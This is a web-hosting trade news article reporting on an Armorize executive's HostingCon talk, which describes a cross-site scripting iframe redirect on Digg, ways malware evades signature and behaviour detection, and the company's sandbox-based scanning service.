(WEB HOST INDUSTRY REVIEW) — As hackers deploy increasingly sophisticated methods of attacks, hosts are faced with a threat that could cost them computing power and customers. Such problems, however, also present opportunities — companies can differentiate themselves by being able to offer malware detection.
But there is a danger in trusting malware solutions that rely on traditional tactics, said Armorize chief executive officer Caleb Sima in his Wednesday morning HostingCon presentation, “Conquering Web-based Malware.”
Using open source penetration testing framework Metasploit, Sima demonstrated a simple malware attack on a dummy desktop instance to show how easily websites are exploited. Rather than using an obscure site, he used highly trafficed site Digg as his example. Ever-popular Digg has a persistent cross-site scripting exploit that directs users with malicious links.
Within the site code, malicious individuals are able to plat code that appends the link string to create an iframe, that redirects the user to a location that’s unknown to the user. In this case, this obfuscated code leads individuals to a URL on zcrack.org.
“People say, ‘Dont’s go to untrusted websites,’” Sima said, “but this is happening on major websites.”
And it doesn’t have to be this way. Signature-based detection and behaviour-based detection are limited for various reasons. Signatures don’t matter, Sima said, because new signatures can easily be created, and scanners simply cannot keep up with the millions created each year. Behaviour-based analysis is circumvented using a variety of interesting ways. “When I started, I was amazed at how ingenious these guys get,” Sima said. Some tactics include only running scripts during peak times, and never using the same IP twice.
The only way to detect these obfuscated codes, and hidden malware, is to actaully run these pages inside a virtual machine that is very specialized, and able to observe the exploitation. With this tactic, Armorize is able to scan all the pages and render them in a sandbox environment, revealing any suspicious code no matter how well concealed.
Japanese firm GMO used Armorize when it decided to launch the first malware-free hosting service. When it launched in 2009, it was wildly successful, out-selling free SSL and free antivirus options across all brands. “Web malware is becoming a differentiator for companies,” Sima said. To this end, Armorize offers API access and a white-label front end to let any hosting provider differentiate themselves on security.
